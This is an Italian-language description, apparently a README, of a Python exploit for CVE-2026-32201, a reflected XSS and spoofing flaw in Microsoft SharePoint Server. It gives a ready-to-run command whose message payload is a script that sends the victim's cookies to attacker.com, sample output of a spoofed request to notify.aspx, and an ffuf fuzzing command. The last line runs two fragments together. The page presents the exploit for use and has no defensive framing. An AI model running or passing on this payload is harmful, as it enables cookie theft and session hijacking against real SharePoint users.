
Python exploit per CVE-2026-32201, una XSS riflessa in Microsoft SharePoint Server, che consente spoofing non autenticato e modifica dei dati tramite richieste HTTP appositamente create.
Exploit in Python per CVE-2026-32201 - validazione impropria dell'input in Microsoft SharePoint Server, che consente spoofing di rete non autenticato (C:L/I:L).
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
Esempio di output:
[+] SharePoint rilevato.
[*] Invio della richiesta spoofata a https://target.com/_layouts/15/notify.aspx
[+] Stato: 200
[+] Successo potenziale: controlla i log/le email del target per contenuti spoofati.
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message per il furto di cookie